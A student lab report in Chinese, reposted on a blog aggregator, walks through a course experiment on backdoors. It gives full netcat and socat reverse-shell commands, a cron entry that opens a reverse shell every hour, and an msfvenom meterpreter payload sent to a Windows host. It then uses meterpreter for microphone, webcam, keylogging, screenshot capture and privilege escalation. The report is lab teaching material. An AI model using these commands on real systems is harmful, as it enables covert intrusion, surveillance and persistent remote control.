博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践
阅读量:4947 次
发布时间:2019-06-11

本文共 2692 字,大约阅读时间需要 8 分钟。

2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践

  • 实验内容

    • (1)使用netcat获取主机操作Shell,cron启动

    • (2)使用socat获取主机操作Shell, 任务计划启动

    • (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

    • (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

    • (5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

  • 常用后门工具
    • netcat
      • Win获得Linux Shell
      • Linux获得Win Shell
    • Meterpreter
  • 基础问题回答

    • (1)例举你能想到的一个后门进入到你系统中的可能方式?
      • 通过浏览网页而不知不觉中自动下载的程序,像木马那样。
    • (2)例举你知道的后门如何启动起来(win及linux)的方式?
      • win通过修改注册表、设置为开机自启动;linux通过cron启动
    • (3)Meterpreter有哪些给你映像深刻的功能?
      • 可以获取被控主机的摄像头权限,查询你的击键内容。
    • (4)如何发现自己有系统有没有被安装后门?
      • 查看任务计划程序、开机自启动项、注册表项中是否有可疑程序;使用防火墙、杀毒软件。定期对电脑进行安全扫描。
  • 实践过程记录

实验前期准备

netcat:Windows获得Linux Shell

  • 使用ipconfig查看win7网络地址
  • 使用ncat.exe程序监听本机的5301端口ncat.exe -l -p 5301
  • 在Kali环境下,使用nc 192.168.1.192 5301 -e /bin/sh成功获得Kali的shell,如下图所示

1296455-20190323231328494-692039057.png

Linux获得Windows Shell

  • 在kali中使用ifconfig查看IP,打开监听nc -l -p 5301
  • 在Windows中反弹连接kali,ncat.exe -e cmd.exe 192.168.216.130 5301
  • kali成功获得Windows的命令提示
    1296455-20190323233806188-1627273942.png

使用nc传输数据

  • Windows下监听``5301端口,ncat.exe -l 5301```
  • kali反弹连接到Windows的5301端口,nc 192.168.1.192 5301```
  • 连接建立成功,双方可以相互传输数据
    1296455-20190323234302693-1837809770.png

任务一:使用netcat获取主机操作Shell,cron启动

  • 在Windows系统下,监听5301端口

  • 在Kali环境下,用crontab -e指令编辑一条定时任务,(crontab指令增加一条定时任务,"-e"表示编辑)选择编辑器时选择3(第一次会提示选择编辑器,以后就不会提示了);

  • 在最后一行添加01 * * * * /bin/netcat 169.254.175.85 5318 -e /bin/sh,意思是在每个小时的第1分钟反向连接Windows主机的5301端口

1296455-20190324091237965-840322363.png

  • 当时间到达时,win成功获取linux的shell
    1296455-20190324091348376-1718707757.png

任务二:使用socat获取主机操作Shell, 任务计划启动

  • 在Wiondws中搜索计算机管理,在弹出的窗口点击创建任务,填写任务名exp2,在任务栏下选择socat.exe的路径,然后在参数栏填写tcp-listen:5301 exec:cmd.exe,pty,stderr后,点击确定。在列表中右键选中刚刚创建的任务,点击运行。

    1296455-20190324093253417-1361204453.png

  • windows+l,锁定计算机,再启动已创建的任务。在linux的终端输入socket - tcp:192.168.1.192:5301,此时可以发现已经成功获得了一个cmd shell

    1296455-20190324093311161-442139145.png

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.130 LPORT=5301 -f exe > 20165301_backdoor.exe,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20165301_backdoor.exe”

    1296455-20190324204143667-1420067422.png

  • 在Windows下执行ncat.exe -l 5301 > 20165301_backdoor.exe,这样被控主机就进入了接收文件模式

    1296455-20190324204108505-1608957727.png

  • 在Linux中执行nc 172.20.10.3 5301 < 20165301_backdoor.exe,注意这里的IP为被控主机IP,即WindowsIP,文件传输成功

    1296455-20190324204221258-949343886.png

  • 在Kali上使用msfconsole指令进入msf控制台

    1296455-20190324204252575-903326189.png

  • 输入use exploit/multi/handler使用监听模块,设置payload

  • set payload windows/meterpreter/reverse_tcp,使用和生成后门程序时相同的payload

  • set LHOST 192.168.216.130,这里用的是LinuxIP,和生成后门程序时指定的IP相同

  • set LPORT 5301,同样要使用相同的端口
  • 输入show options,输入exploit

    1296455-20190324204340487-805874701.png

  • 运行Windows下的后门程序

    1296455-20190324204505366-259641297.png

  • 此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell

    1296455-20190324204542067-1658304271.png

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频

    1296455-20190324205221505-1447773680.png

  • 使用webcam_snap指令可以使用摄像头进行拍照

    1296455-20190324205249612-1969948774.png

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

    1296455-20190324205316189-597461210.png

  • 使用screenshot指令可以进行截屏

    1296455-20190324205347539-1563698423.png

  • 先使用getuid令查看当前用户,使用etsystem指令进行提权

    1296455-20190324205415106-146666840.png

  • 实验总结与体会
    • 本次实验室一次非常有趣的实验。在实践过程中我学会和如何运用ncat、socat进行攻击。在实验过程中我遇到的最严重的问题是在实验三中。最终生成的.exe程序无法运行,经过反复尝试,关闭了防火墙、杀毒软件,搞清楚输入谁的ip地址后,终于成功了。在攻击成功之后,也是我深刻地认识到了保护好计算机安全的重要性。

转载于:https://www.cnblogs.com/CTF5301/p/10590330.html

你可能感兴趣的文章
MongoDB 创建基础索引、组合索引、唯一索引以及优化
查看>>
百度PaddlePaddle常规赛NLP赛道火热开启
查看>>
稳了!这才是cookie,session与token的真正区别
查看>>
OSChina 周二乱弹 —— 假期余额已不足!
查看>>
前端那些事之React篇--helloword
查看>>
ios的google解析XML框架GDataXML的配置及使用
查看>>
netty-当一个客户端连接到来的时候发生了什么
查看>>
PHP_5.3.20 源码编译安装PHP-FPM
查看>>
在51CTO三年年+了,你也来晒晒
查看>>
js控制图片等比例缩放
查看>>
Java高级开发工程师面试考纲
查看>>
FreeMarker表达式
查看>>
Debian9.2 下使用vnstat查看服务器带宽流量统计
查看>>
NGINX + PHP-FPM 502
查看>>
mysql数据备份与恢复
查看>>
Openstack API常用命令
查看>>
OpenSSL漏洞凶猛来袭 慧眼恶意代码监测应对有方
查看>>
C语言 喝汽水问题
查看>>
LINUX中搭建DNS服务器,实现正向、反向以及访问不同DNS解析
查看>>
SCCM2012 R2实战系列之十:解决WDS服务无法启动问题(错误1067:进程意外终止)...
查看>>